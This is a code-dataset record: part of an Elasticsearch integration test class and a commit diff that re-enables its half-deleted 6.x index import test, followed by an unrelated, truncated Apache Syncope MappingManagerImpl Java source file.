*/ public void testRecoverMissingAnalyzer() throws Exception { logger.info("--> starting one node"); internalCluster().startNode(); prepareCreate("test").setSettings(Settings.builder() .put("index.analysis.analyzer.test.tokenizer", "standard") .put("index.number_of_shards", "1")) .setMapping("{\n" + " \"properties\": {\n" + " \"field1\": {\n" + " \"type\": \"text\",\n" + " \"analyzer\": \"test\"\n" + " }\n" + " }\n" + " }}").get(); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value one").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); if (usually()) { ensureYellow(); } else { internalCluster().startNode(); client().admin().cluster() .health(Requests.clusterHealthRequest() .waitForGreenStatus() .waitForEvents(Priority.LANGUID) .waitForNoRelocatingShards(true).waitForNodes("2")).actionGet(); } ClusterState state = client().admin().cluster().prepareState().get().getState(); final IndexMetadata metadata = state.getMetadata().index("test"); final IndexMetadata.Builder brokenMeta = IndexMetadata.builder(metadata).settings(metadata.getSettings() .filter((s) -> "index.analysis.analyzer.test.tokenizer".equals(s) == false)); restartNodesOnBrokenClusterState(ClusterState.builder(state).metadata(Metadata.builder(state.getMetadata()).put(brokenMeta))); // check that the cluster does not keep reallocating shards assertBusy(() -> { final RoutingTable routingTable = client().admin().cluster().prepareState().get().getState().routingTable(); final IndexRoutingTable indexRoutingTable = routingTable.index("test"); assertNotNull(indexRoutingTable); for (IndexShardRoutingTable shardRoutingTable : indexRoutingTable) { assertTrue(shardRoutingTable.primaryShard().unassigned()); assertEquals(UnassignedInfo.AllocationStatus.DECIDERS_NO, shardRoutingTable.primaryShard().unassignedInfo().getLastAllocationStatus()); assertThat(shardRoutingTable.primaryShard().unassignedInfo().getNumFailedAllocations(), greaterThan(0)); } }, 60, TimeUnit.SECONDS); client().admin().indices().prepareClose("test").get(); // try to open it with the broken setting - fail again! 
ElasticsearchException ex = expectThrows(ElasticsearchException.class, () -> client().admin().indices().prepareOpen("test").get()); assertEquals(ex.getMessage(), "Failed to verify index " + metadata.getIndex()); assertNotNull(ex.getCause()); assertEquals(MapperParsingException.class, ex.getCause().getClass()); assertThat(ex.getCause().getMessage(), containsString("analyzer [test] has not been configured in mappings")); } public void testArchiveBrokenClusterSettings() throws Exception { logger.info("--> starting one node"); internalCluster().startNode(); client().prepareIndex("test").setId("1").setSource("field1", "value1").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); if (usually()) { ensureYellow(); } else { internalCluster().startNode(); client().admin().cluster() .health(Requests.clusterHealthRequest() .waitForGreenStatus() .waitForEvents(Priority.LANGUID) .waitForNoRelocatingShards(true).waitForNodes("2")).actionGet(); } ClusterState state = client().admin().cluster().prepareState().get().getState(); final Metadata metadata = state.getMetadata(); final Metadata brokenMeta = Metadata.builder(metadata).persistentSettings(Settings.builder() .put(metadata.persistentSettings()).put("this.is.unknown", true) .put(ShardLimitValidator.SETTING_CLUSTER_MAX_SHARDS_PER_NODE.getKey(), "broken").build()).build(); restartNodesOnBrokenClusterState(ClusterState.builder(state).metadata(brokenMeta)); ensureYellow("test"); // wait for state recovery state = client().admin().cluster().prepareState().get().getState(); assertEquals("true", state.metadata().persistentSettings().get("archived.this.is.unknown")); assertEquals("broken", state.metadata().persistentSettings().get("archived." + ShardLimitValidator.SETTING_CLUSTER_MAX_SHARDS_PER_NODE.getKey())); // delete these settings client().admin().cluster().prepareUpdateSettings().setPersistentSettings(Settings.builder().putNull("archived.*")).get(); state = client().admin().cluster().prepareState().get().getState(); assertNull(state.metadata().persistentSettings().get("archived.this.is.unknown")); assertNull(state.metadata().persistentSettings().get("archived." + ShardLimitValidator.SETTING_CLUSTER_MAX_SHARDS_PER_NODE.getKey())); assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); } @AwaitsFix(bugUrl = "https://github.com/elastic/elasticsearch/issues/48701") // This test relates to loading a broken state that was written by a 6.x node, but for now we do not load state from old nodes. public void testHalfDeletedIndexImport() throws Exception { // It's possible for a 6.x node to add a tombstone for an index but not actually delete the index metadata from disk since that // deletion is slightly deferred and may race against the node being shut down; if you upgrade to 7.x when in this state then the // node won't start. 
internalCluster().startNode(); createIndex("test", Settings.builder() .put(IndexMetadata.SETTING_NUMBER_OF_SHARDS, 1) .put(IndexMetadata.SETTING_NUMBER_OF_REPLICAS, 0) .build()); ensureGreen("test"); final Metadata metadata = internalCluster().getInstance(ClusterService.class).state().metadata(); final Path[] paths = internalCluster().getInstance(NodeEnvironment.class).nodeDataPaths(); // writeBrokenMeta(metaStateService -> { // metaStateService.writeGlobalState("test", Metadata.builder(metadata) // // we remove the manifest file, resetting the term and making this look like an upgrade from 6.x, so must also reset the // // term in the coordination metadata // .coordinationMetadata(CoordinationMetadata.builder(metadata.coordinationMetadata()).term(0L).build()) // // add a tombstone but do not delete the index metadata from disk // .putCustom(IndexGraveyard.TYPE, IndexGraveyard.builder().addTombstone(metadata.index("test").getIndex()).build()).build()); // for (final Path path : paths) { // try (Stream<Path> stateFiles = Files.list(path.resolve(MetadataStateFormat.STATE_DIR_NAME))) { // for (final Path manifestPath : stateFiles // .filter(p -> p.getFileName().toString().startsWith(Manifest.FORMAT.getPrefix())).collect(Collectors.toList())) { // IOUtils.rm(manifestPath); // } // } // } // }); ensureGreen(); assertBusy(() -> assertThat(internalCluster().getInstance(NodeEnvironment.class).availableIndexFolders(), empty())); } private void restartNodesOnBrokenClusterState(ClusterState.Builder clusterStateBuilder) throws Exception { Map<String, PersistedClusterStateService> lucenePersistedStateFactories = Stream.of(internalCluster().getNodeNames()) .collect(Collectors.toMap(Function.identity(), nodeName -> internalCluster().getInstance(PersistedClusterStateService.class, nodeName))); final ClusterState clusterState = clusterStateBuilder.build(); internalCluster().fullRestart(new RestartCallback(){ @Override public Settings onNodeStopped(String nodeName) throws Exception { final PersistedClusterStateService lucenePersistedStateFactory = lucenePersistedStateFactories.get(nodeName); try (PersistedClusterStateService.Writer writer = lucenePersistedStateFactory.createWriter()) { writer.writeFullStateAndCommit(clusterState.term(), clusterState); } return super.onNodeStopped(nodeName); } }); } }
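The restartNodesOnBrokenClusterState helper at the end of the test class above captures a PersistedClusterStateService per node, takes the whole cluster through a full restart, and rewrites each node's persisted state while that node is stopped; the commit described in the following fields reinstates a writeBrokenMeta helper built on the same stop-rewrite-restart pattern. A commented sketch of that pattern, assuming an ESIntegTestCase-style internal-cluster test with the usual org.elasticsearch.* and java.util imports in scope (the method name here is illustrative, not taken from the source):

private void rewriteStateWhileNodesAreDown(final ClusterState brokenState) throws Exception {
    // Capture one PersistedClusterStateService per node while the cluster is still up;
    // the instances remain usable inside the restart callback.
    Map<String, PersistedClusterStateService> services = Stream.of(internalCluster().getNodeNames())
        .collect(Collectors.toMap(Function.identity(),
            nodeName -> internalCluster().getInstance(PersistedClusterStateService.class, nodeName)));
    internalCluster().fullRestart(new RestartCallback() {
        @Override
        public Settings onNodeStopped(String nodeName) throws Exception {
            // The node is stopped at this point, so its on-disk cluster state can be rewritten safely.
            try (PersistedClusterStateService.Writer writer = services.get(nodeName).createWriter()) {
                writer.writeFullStateAndCommit(brokenState.term(), brokenState);
            }
            return super.onNodeStopped(nodeName);
        }
    });
}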
Fix test for half-deleted 6x indices import (#67587) Re-enabled and fixed the test that verifies that we properly clean up leftover 6.x data.
server/src/internalClusterTest/java/org/elasticsearch/gateway/GatewayIndexStateIT.java
Fix test for half-deleted 6x indices import (#67587)
<ide><path>server/src/internalClusterTest/java/org/elasticsearch/gateway/GatewayIndexStateIT.java <ide> import org.elasticsearch.client.Client; <ide> import org.elasticsearch.client.Requests; <ide> import org.elasticsearch.cluster.ClusterState; <add>import org.elasticsearch.cluster.coordination.CoordinationMetadata; <ide> import org.elasticsearch.cluster.metadata.IndexGraveyard; <ide> import org.elasticsearch.cluster.metadata.IndexMetadata; <ide> import org.elasticsearch.cluster.metadata.MappingMetadata; <ide> import org.elasticsearch.cluster.routing.ShardRoutingState; <ide> import org.elasticsearch.cluster.routing.UnassignedInfo; <ide> import org.elasticsearch.cluster.service.ClusterService; <add>import org.elasticsearch.common.CheckedConsumer; <ide> import org.elasticsearch.common.Priority; <ide> import org.elasticsearch.common.settings.Settings; <ide> import org.elasticsearch.common.xcontent.XContentFactory; <add>import org.elasticsearch.core.internal.io.IOUtils; <ide> import org.elasticsearch.env.NodeEnvironment; <add>import org.elasticsearch.env.NodeMetadata; <ide> import org.elasticsearch.index.mapper.MapperParsingException; <ide> import org.elasticsearch.indices.IndexClosedException; <ide> import org.elasticsearch.indices.ShardLimitValidator; <ide> assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); <ide> } <ide> <del> @AwaitsFix(bugUrl = "https://github.com/elastic/elasticsearch/issues/48701") <del> // This test relates to loading a broken state that was written by a 6.x node, but for now we do not load state from old nodes. <ide> public void testHalfDeletedIndexImport() throws Exception { <ide> // It's possible for a 6.x node to add a tombstone for an index but not actually delete the index metadata from disk since that <ide> // deletion is slightly deferred and may race against the node being shut down; if you upgrade to 7.x when in this state then the <ide> // node won't start.
<ide> <del> internalCluster().startNode(); <add> final String nodeName = internalCluster().startNode(); <ide> createIndex("test", Settings.builder() <ide> .put(IndexMetadata.SETTING_NUMBER_OF_SHARDS, 1) <ide> .put(IndexMetadata.SETTING_NUMBER_OF_REPLICAS, 0) <ide> <ide> final Metadata metadata = internalCluster().getInstance(ClusterService.class).state().metadata(); <ide> final Path[] paths = internalCluster().getInstance(NodeEnvironment.class).nodeDataPaths(); <del>// writeBrokenMeta(metaStateService -> { <del>// metaStateService.writeGlobalState("test", Metadata.builder(metadata) <del>// // we remove the manifest file, resetting the term and making this look like an upgrade from 6.x, so must also reset the <del>// // term in the coordination metadata <del>// .coordinationMetadata(CoordinationMetadata.builder(metadata.coordinationMetadata()).term(0L).build()) <del>// // add a tombstone but do not delete the index metadata from disk <del>// .putCustom(IndexGraveyard.TYPE, IndexGraveyard.builder().addTombstone(metadata.index("test").getIndex()).build()).build()); <del>// for (final Path path : paths) { <del>// try (Stream<Path> stateFiles = Files.list(path.resolve(MetadataStateFormat.STATE_DIR_NAME))) { <del>// for (final Path manifestPath : stateFiles <del>// .filter(p -> p.getFileName().toString().startsWith(Manifest.FORMAT.getPrefix())).collect(Collectors.toList())) { <del>// IOUtils.rm(manifestPath); <del>// } <del>// } <del>// } <del>// }); <add> final String nodeId = client().admin().cluster().prepareNodesInfo(nodeName).clear().get().getNodes().get(0).getNode().getId(); <add> <add> writeBrokenMeta(metaStateService -> { <add> for (final Path path : paths) { <add> IOUtils.rm(path.resolve(PersistedClusterStateService.METADATA_DIRECTORY_NAME)); <add> } <add> metaStateService.writeGlobalState("test", Metadata.builder(metadata) <add> // we remove the manifest file, resetting the term and making this look like an upgrade from 6.x, so must also reset the <add> // term in the coordination metadata <add> .coordinationMetadata(CoordinationMetadata.builder(metadata.coordinationMetadata()).term(0L).build()) <add> // add a tombstone but do not delete the index metadata from disk <add> .putCustom(IndexGraveyard.TYPE, IndexGraveyard.builder().addTombstone(metadata.index("test").getIndex()).build()).build()); <add> NodeMetadata.FORMAT.writeAndCleanup(new NodeMetadata(nodeId, Version.CURRENT), paths); <add> }); <ide> <ide> ensureGreen(); <ide> <ide> assertBusy(() -> assertThat(internalCluster().getInstance(NodeEnvironment.class).availableIndexFolders(), empty())); <add> } <add> <add> private void writeBrokenMeta(CheckedConsumer<MetaStateService, IOException> writer) throws Exception { <add> Map<String, MetaStateService> metaStateServices = Stream.of(internalCluster().getNodeNames()) <add> .collect(Collectors.toMap(Function.identity(), nodeName -> internalCluster().getInstance(MetaStateService.class, nodeName))); <add> internalCluster().fullRestart(new RestartCallback(){ <add> @Override <add> public Settings onNodeStopped(String nodeName) throws Exception { <add> final MetaStateService metaStateService = metaStateServices.get(nodeName); <add> writer.accept(metaStateService); <add> return super.onNodeStopped(nodeName); <add> } <add> }); <ide> } <ide> <ide> private void restartNodesOnBrokenClusterState(ClusterState.Builder clusterStateBuilder) throws Exception {
Java
apache-2.0
ad7bb3225531b0382f3625fc6d4ed197c38325ce
0
ilgrosso/syncope,apache/syncope,apache/syncope,ilgrosso/syncope,ilgrosso/syncope,ilgrosso/syncope,apache/syncope,apache/syncope
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.syncope.core.provisioning.java; import java.util.ArrayList; import java.util.Collections; import java.util.HashSet; import java.util.List; import java.util.Optional; import java.util.Set; import org.apache.commons.lang3.StringUtils; import org.apache.commons.lang3.reflect.FieldUtils; import org.apache.commons.lang3.tuple.Pair; import org.apache.syncope.common.lib.to.AnyObjectTO; import org.apache.syncope.common.lib.to.AnyTO; import org.apache.syncope.common.lib.to.AttrTO; import org.apache.syncope.common.lib.to.GroupTO; import org.apache.syncope.common.lib.to.GroupableRelatableTO; import org.apache.syncope.common.lib.to.MembershipTO; import org.apache.syncope.common.lib.to.RealmTO; import org.apache.syncope.common.lib.to.UserTO; import org.apache.syncope.common.lib.types.AttrSchemaType; import org.apache.syncope.core.persistence.api.attrvalue.validation.ParsingValidationException; import org.apache.syncope.core.persistence.api.dao.AnyObjectDAO; import org.apache.syncope.core.persistence.api.dao.AnyTypeDAO; import org.apache.syncope.core.persistence.api.dao.DerSchemaDAO; import org.apache.syncope.core.persistence.api.dao.GroupDAO; import org.apache.syncope.core.persistence.api.dao.PlainSchemaDAO; import org.apache.syncope.core.persistence.api.dao.RealmDAO; import org.apache.syncope.core.persistence.api.dao.VirSchemaDAO; import org.apache.syncope.core.persistence.api.entity.Any; import org.apache.syncope.core.persistence.api.entity.AnyUtils; import org.apache.syncope.core.persistence.api.entity.AnyUtilsFactory; import org.apache.syncope.core.persistence.api.entity.DerSchema; import org.apache.syncope.core.persistence.api.entity.EntityFactory; import org.apache.syncope.core.persistence.api.entity.GroupableRelatable; import org.apache.syncope.core.persistence.api.entity.Membership; import org.apache.syncope.core.persistence.api.entity.PlainAttr; import org.apache.syncope.core.persistence.api.entity.PlainAttrValue; import org.apache.syncope.core.persistence.api.entity.PlainSchema; import org.apache.syncope.core.persistence.api.entity.Realm; import org.apache.syncope.core.persistence.api.entity.Schema; import org.apache.syncope.core.persistence.api.entity.VirSchema; import org.apache.syncope.core.persistence.api.entity.anyobject.AnyObject; import org.apache.syncope.core.persistence.api.entity.group.Group; import org.apache.syncope.core.persistence.api.entity.resource.Item; import org.apache.syncope.core.persistence.api.entity.resource.Mapping; import org.apache.syncope.core.persistence.api.entity.resource.MappingItem; import org.apache.syncope.core.persistence.api.entity.resource.OrgUnit; import org.apache.syncope.core.persistence.api.entity.resource.OrgUnitItem; import 
org.apache.syncope.core.persistence.api.entity.resource.Provision; import org.apache.syncope.core.persistence.api.entity.user.UPlainAttrValue; import org.apache.syncope.core.persistence.api.entity.user.User; import org.apache.syncope.core.provisioning.api.DerAttrHandler; import org.apache.syncope.core.provisioning.api.IntAttrName; import org.apache.syncope.core.provisioning.api.MappingManager; import org.apache.syncope.core.provisioning.api.VirAttrHandler; import org.apache.syncope.core.provisioning.api.cache.VirAttrCache; import org.apache.syncope.core.provisioning.api.utils.policy.InvalidPasswordRuleConf; import org.apache.syncope.core.provisioning.java.utils.ConnObjectUtils; import org.apache.syncope.core.provisioning.java.utils.MappingUtils; import org.apache.syncope.core.spring.security.Encryptor; import org.apache.syncope.core.spring.security.PasswordGenerator; import org.identityconnectors.framework.common.FrameworkUtil; import org.identityconnectors.framework.common.objects.Attribute; import org.identityconnectors.framework.common.objects.AttributeBuilder; import org.identityconnectors.framework.common.objects.AttributeUtil; import org.identityconnectors.framework.common.objects.OperationalAttributes; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Component; import org.springframework.transaction.annotation.Transactional; import org.apache.syncope.core.provisioning.api.data.ItemTransformer; import org.identityconnectors.framework.common.objects.Name; @Component public class MappingManagerImpl implements MappingManager { private static final Logger LOG = LoggerFactory.getLogger(MappingManager.class); private static final Encryptor ENCRYPTOR = Encryptor.getInstance(); @Autowired private AnyTypeDAO anyTypeDAO; @Autowired private PlainSchemaDAO plainSchemaDAO; @Autowired private DerSchemaDAO derSchemaDAO; @Autowired private VirSchemaDAO virSchemaDAO; @Autowired private AnyObjectDAO anyObjectDAO; @Autowired private GroupDAO groupDAO; @Autowired private RealmDAO realmDAO; @Autowired private DerAttrHandler derAttrHandler; @Autowired private VirAttrHandler virAttrHandler; @Autowired private VirAttrCache virAttrCache; @Autowired private PasswordGenerator passwordGenerator; @Autowired private EntityFactory entityFactory; @Autowired private AnyUtilsFactory anyUtilsFactory; @Autowired private IntAttrNameParser intAttrNameParser; @Transactional(readOnly = true) @Override public Pair<String, Set<Attribute>> prepareAttrs( final Any<?> any, final String password, final boolean changePwd, final Boolean enable, final Provision provision) { LOG.debug("Preparing resource attributes for {} with provision {} for attributes {}", any, provision, any.getPlainAttrs()); Set<Attribute> attributes = new HashSet<>(); String connObjectKey = null; for (Item mapItem : MappingUtils.getPropagationItems(provision.getMapping().getItems())) { LOG.debug("Processing expression '{}'", mapItem.getIntAttrName()); try { Pair<String, Attribute> preparedAttr = prepareAttr(provision, mapItem, any, password); if (preparedAttr != null) { if (preparedAttr.getLeft() != null) { connObjectKey = preparedAttr.getLeft(); } if (preparedAttr.getRight() != null) { Attribute alreadyAdded = AttributeUtil.find(preparedAttr.getRight().getName(), attributes); if (alreadyAdded == null) { attributes.add(preparedAttr.getRight()); } else { attributes.remove(alreadyAdded); Set<Object> values = new HashSet<>(); if (alreadyAdded.getValue() != 
null && !alreadyAdded.getValue().isEmpty()) { values.addAll(alreadyAdded.getValue()); } if (preparedAttr.getRight().getValue() != null) { values.addAll(preparedAttr.getRight().getValue()); } attributes.add(AttributeBuilder.build(preparedAttr.getRight().getName(), values)); } } } } catch (Exception e) { LOG.error("Expression '{}' processing failed", mapItem.getIntAttrName(), e); } } Optional<MappingItem> connObjectKeyItem = MappingUtils.getConnObjectKeyItem(provision); if (connObjectKeyItem.isPresent()) { Attribute connObjectKeyExtAttr = AttributeUtil.find(connObjectKeyItem.get().getExtAttrName(), attributes); if (connObjectKeyExtAttr != null) { attributes.remove(connObjectKeyExtAttr); attributes.add(AttributeBuilder.build(connObjectKeyItem.get().getExtAttrName(), connObjectKey)); } Name name = MappingUtils.evaluateNAME(any, provision, connObjectKey); attributes.add(name); if (connObjectKey != null && !connObjectKey.equals(name.getNameValue()) && connObjectKeyExtAttr == null) { attributes.add(AttributeBuilder.build(connObjectKeyItem.get().getExtAttrName(), connObjectKey)); } } if (enable != null) { attributes.add(AttributeBuilder.buildEnabled(enable)); } if (!changePwd) { Attribute pwdAttr = AttributeUtil.find(OperationalAttributes.PASSWORD_NAME, attributes); if (pwdAttr != null) { attributes.remove(pwdAttr); } } return Pair.of(connObjectKey, attributes); } private String getIntValue(final Realm realm, final Item orgUnitItem) { String value = null; switch (orgUnitItem.getIntAttrName()) { case "key": value = realm.getKey(); break; case "name": value = realm.getName(); break; case "fullpath": value = realm.getFullPath(); break; default: } return value; } @Override public Pair<String, Set<Attribute>> prepareAttrs(final Realm realm, final OrgUnit orgUnit) { LOG.debug("Preparing resource attributes for {} with orgUnit {}", realm, orgUnit); Set<Attribute> attributes = new HashSet<>(); String connObjectKey = null; for (Item orgUnitItem : MappingUtils.getPropagationItems(orgUnit.getItems())) { LOG.debug("Processing expression '{}'", orgUnitItem.getIntAttrName()); String value = getIntValue(realm, orgUnitItem); if (orgUnitItem.isConnObjectKey()) { connObjectKey = value; } Attribute alreadyAdded = AttributeUtil.find(orgUnitItem.getExtAttrName(), attributes); if (alreadyAdded == null) { if (value == null) { attributes.add(AttributeBuilder.build(orgUnitItem.getExtAttrName())); } else { attributes.add(AttributeBuilder.build(orgUnitItem.getExtAttrName(), value)); } } else if (value != null) { attributes.remove(alreadyAdded); Set<Object> values = new HashSet<>(); if (alreadyAdded.getValue() != null && !alreadyAdded.getValue().isEmpty()) { values.addAll(alreadyAdded.getValue()); } values.add(value); attributes.add(AttributeBuilder.build(orgUnitItem.getExtAttrName(), values)); } } Attribute connObjectKeyExtAttr = AttributeUtil.find(orgUnit.getConnObjectKeyItem().get().getExtAttrName(), attributes); if (connObjectKeyExtAttr != null) { attributes.remove(connObjectKeyExtAttr); attributes.add( AttributeBuilder.build(orgUnit.getConnObjectKeyItem().get().getExtAttrName(), connObjectKey)); } attributes.add(MappingUtils.evaluateNAME(realm, orgUnit, connObjectKey)); return Pair.of(connObjectKey, attributes); } /** * Prepare an attribute to be sent to a connector instance. 
* * @param provision external resource * @param mapItem mapping item for the given attribute * @param any given any object * @param password clear-text password * @return connObjectKey + prepared attribute */ private Pair<String, Attribute> prepareAttr( final Provision provision, final Item mapItem, final Any<?> any, final String password) { IntAttrName intAttrName = intAttrNameParser.parse(mapItem.getIntAttrName(), provision.getAnyType().getKind()); boolean readOnlyVirSchema = false; Schema schema = null; AttrSchemaType schemaType = AttrSchemaType.String; if (intAttrName.getSchemaType() != null) { switch (intAttrName.getSchemaType()) { case PLAIN: schema = plainSchemaDAO.find(intAttrName.getSchemaName()); if (schema != null) { schemaType = schema.getType(); } break; case VIRTUAL: schema = virSchemaDAO.find(intAttrName.getSchemaName()); readOnlyVirSchema = (schema != null && schema.isReadonly()); break; default: } } List<PlainAttrValue> values = getIntValues(provision, mapItem, intAttrName, any); LOG.debug("Define mapping for: " + "\n* ExtAttrName " + mapItem.getExtAttrName() + "\n* is connObjectKey " + mapItem.isConnObjectKey() + "\n* is password " + mapItem.isPassword() + "\n* mandatory condition " + mapItem.getMandatoryCondition() + "\n* Schema " + intAttrName.getSchemaName() + "\n* ClassType " + schemaType.getType().getName() + "\n* Values " + values); Pair<String, Attribute> result; if (readOnlyVirSchema) { result = null; } else { List<Object> objValues = new ArrayList<>(); for (PlainAttrValue value : values) { if (FrameworkUtil.isSupportedAttributeType(schemaType.getType())) { objValues.add(value.getValue()); } else { objValues.add(value.getValueAsString(schemaType)); } } if (mapItem.isConnObjectKey()) { result = Pair.of(objValues.isEmpty() ? null : objValues.iterator().next().toString(), null); } else if (mapItem.isPassword() && any instanceof User) { String passwordAttrValue = password; if (StringUtils.isBlank(passwordAttrValue)) { User user = (User) any; if (user.canDecodePassword()) { try { passwordAttrValue = ENCRYPTOR.decode(user.getPassword(), user.getCipherAlgorithm()); } catch (Exception e) { LOG.error("Could not decode password for {}", user, e); } } else if (provision.getResource().isRandomPwdIfNotProvided()) { try { passwordAttrValue = passwordGenerator.generate(provision.getResource()); } catch (InvalidPasswordRuleConf e) { LOG.error("Could not generate policy-compliant random password for {}", user, e); } } } if (passwordAttrValue == null) { result = null; } else { result = Pair.of(null, AttributeBuilder.buildPassword(passwordAttrValue.toCharArray())); } } else if (schema != null && schema.isMultivalue()) { result = Pair.of(null, AttributeBuilder.build(mapItem.getExtAttrName(), objValues)); } else { result = Pair.of(null, objValues.isEmpty() ? 
AttributeBuilder.build(mapItem.getExtAttrName()) : AttributeBuilder.build(mapItem.getExtAttrName(), objValues.iterator().next())); } } return result; } @Transactional(readOnly = true) @Override public List<PlainAttrValue> getIntValues( final Provision provision, final Item mapItem, final IntAttrName intAttrName, final Any<?> any) { LOG.debug("Get internal values for {} as '{}' on {}", any, mapItem.getIntAttrName(), provision.getResource()); Any<?> reference = null; Membership<?> membership = null; if (intAttrName.getEnclosingGroup() == null && intAttrName.getRelatedAnyObject() == null) { reference = any; } if (any instanceof GroupableRelatable) { GroupableRelatable<?, ?, ?, ?, ?> groupableRelatable = (GroupableRelatable<?, ?, ?, ?, ?>) any; if (intAttrName.getEnclosingGroup() != null) { Group group = groupDAO.findByName(intAttrName.getEnclosingGroup()); if (group == null || groupableRelatable.getMembership(group.getKey()) == null) { LOG.warn("No membership for {} in {}, ignoring", intAttrName.getEnclosingGroup(), groupableRelatable); } else { reference = group; } } else if (intAttrName.getRelatedAnyObject() != null) { AnyObject anyObject = anyObjectDAO.findByName(intAttrName.getRelatedAnyObject()); if (anyObject == null || groupableRelatable.getRelationships(anyObject.getKey()).isEmpty()) { LOG.warn("No relationship for {} in {}, ignoring", intAttrName.getRelatedAnyObject(), groupableRelatable); } else { reference = anyObject; } } else if (intAttrName.getMembershipOfGroup() != null) { Group group = groupDAO.findByName(intAttrName.getMembershipOfGroup()); membership = groupableRelatable.getMembership(group.getKey()).orElse(null); } } if (reference == null) { LOG.warn("Could not determine the reference instance for {}", mapItem.getIntAttrName()); return Collections.emptyList(); } List<PlainAttrValue> values = new ArrayList<>(); boolean transform = true; AnyUtils anyUtils = anyUtilsFactory.getInstance(reference); if (intAttrName.getField() != null) { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); switch (intAttrName.getField()) { case "key": attrValue.setStringValue(reference.getKey()); values.add(attrValue); break; case "password": // ignore break; case "username": if (reference instanceof User) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(((User) reference).getUsername()); values.add(attrValue); } break; case "name": if (reference instanceof Group) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(((Group) reference).getName()); values.add(attrValue); } else if (reference instanceof AnyObject) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(((AnyObject) reference).getName()); values.add(attrValue); } break; case "userOwner": case "groupOwner": Mapping uMapping = provision.getAnyType().equals(anyTypeDAO.findUser()) ? provision.getMapping() : null; Mapping gMapping = provision.getAnyType().equals(anyTypeDAO.findGroup()) ? 
provision.getMapping() : null; if (reference instanceof Group) { Group group = (Group) reference; String groupOwnerValue = null; if (group.getUserOwner() != null && uMapping != null) { groupOwnerValue = getGroupOwnerValue(provision, group.getUserOwner()); } if (group.getGroupOwner() != null && gMapping != null) { groupOwnerValue = getGroupOwnerValue(provision, group.getGroupOwner()); } if (StringUtils.isNotBlank(groupOwnerValue)) { attrValue = entityFactory.newEntity(UPlainAttrValue.class); attrValue.setStringValue(groupOwnerValue); values.add(attrValue); } } break; default: try { attrValue.setStringValue(FieldUtils.readField( reference, intAttrName.getField(), true).toString()); values.add(attrValue); } catch (IllegalAccessException e) { LOG.error("Could not read value of '{}' from {}", intAttrName.getField(), reference, e); } } } else if (intAttrName.getSchemaType() != null) { switch (intAttrName.getSchemaType()) { case PLAIN: PlainAttr<?> attr; if (membership == null) { attr = reference.getPlainAttr(intAttrName.getSchemaName()).orElse(null); } else { attr = ((GroupableRelatable<?, ?, ?, ?, ?>) reference).getPlainAttr( intAttrName.getSchemaName(), membership).orElse(null); } if (attr != null) { if (attr.getUniqueValue() != null) { values.add(anyUtils.clonePlainAttrValue(attr.getUniqueValue())); } else if (attr.getValues() != null) { attr.getValues().forEach(value -> values.add(anyUtils.clonePlainAttrValue(value))); } } break; case DERIVED: DerSchema derSchema = derSchemaDAO.find(intAttrName.getSchemaName()); if (derSchema != null) { String value = membership == null ? derAttrHandler.getValue(reference, derSchema) : derAttrHandler.getValue(reference, membership, derSchema); if (value != null) { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); attrValue.setStringValue(value); values.add(attrValue); } } break; case VIRTUAL: // virtual attributes don't get transformed transform = false; VirSchema virSchema = virSchemaDAO.find(intAttrName.getSchemaName()); if (virSchema != null) { LOG.debug("Expire entry cache {}-{}", reference, intAttrName.getSchemaName()); virAttrCache.expire( reference.getType().getKey(), reference.getKey(), intAttrName.getSchemaName()); List<String> virValues = membership == null ? virAttrHandler.getValues(reference, virSchema) : virAttrHandler.getValues(reference, membership, virSchema); virValues.stream(). map(value -> { PlainAttrValue attrValue = anyUtils.newPlainAttrValue(); attrValue.setStringValue(value); return attrValue; }). 
forEachOrdered(attrValue -> values.add(attrValue)); } break; default: } } LOG.debug("Internal values: {}", values); List<PlainAttrValue> transformed = values; if (transform) { for (ItemTransformer transformer : MappingUtils.getItemTransformers(mapItem)) { transformed = transformer.beforePropagation(mapItem, any, transformed); } LOG.debug("Transformed values: {}", values); } else { LOG.debug("No transformation occurred"); } return transformed; } private String getGroupOwnerValue(final Provision provision, final Any<?> any) { Pair<String, Attribute> preparedAttr = prepareAttr(provision, MappingUtils.getConnObjectKeyItem(provision).get(), any, null); String connObjectKey = preparedAttr.getKey(); return MappingUtils.evaluateNAME(any, provision, connObjectKey).getNameValue(); } @Transactional(readOnly = true) @Override public Optional<String> getConnObjectKeyValue(final Any<?> any, final Provision provision) { MappingItem mapItem = provision.getMapping().getConnObjectKeyItem().get(); List<PlainAttrValue> values = getIntValues( provision, mapItem, intAttrNameParser.parse(mapItem.getIntAttrName(), provision.getAnyType().getKind()), any); return Optional.ofNullable(values.isEmpty() ? null : values.get(0).getValueAsString()); } @Transactional(readOnly = true) @Override public String getConnObjectKeyValue(final Realm realm, final OrgUnit orgUnit) { OrgUnitItem orgUnitItem = orgUnit.getConnObjectKeyItem().get(); return getIntValue(realm, orgUnitItem); } @Transactional(readOnly = true) @Override public void setIntValues(final Item mapItem, final Attribute attr, final AnyTO anyTO, final AnyUtils anyUtils) { List<Object> values = null; if (attr != null) { values = attr.getValue(); for (ItemTransformer transformer : MappingUtils.getItemTransformers(mapItem)) { values = transformer.beforePull(mapItem, anyTO, values); } } values = values == null ? Collections.emptyList() : values; IntAttrName intAttrName = intAttrNameParser.parse(mapItem.getIntAttrName(), anyUtils.getAnyTypeKind()); if (intAttrName.getField() != null) { switch (intAttrName.getField()) { case 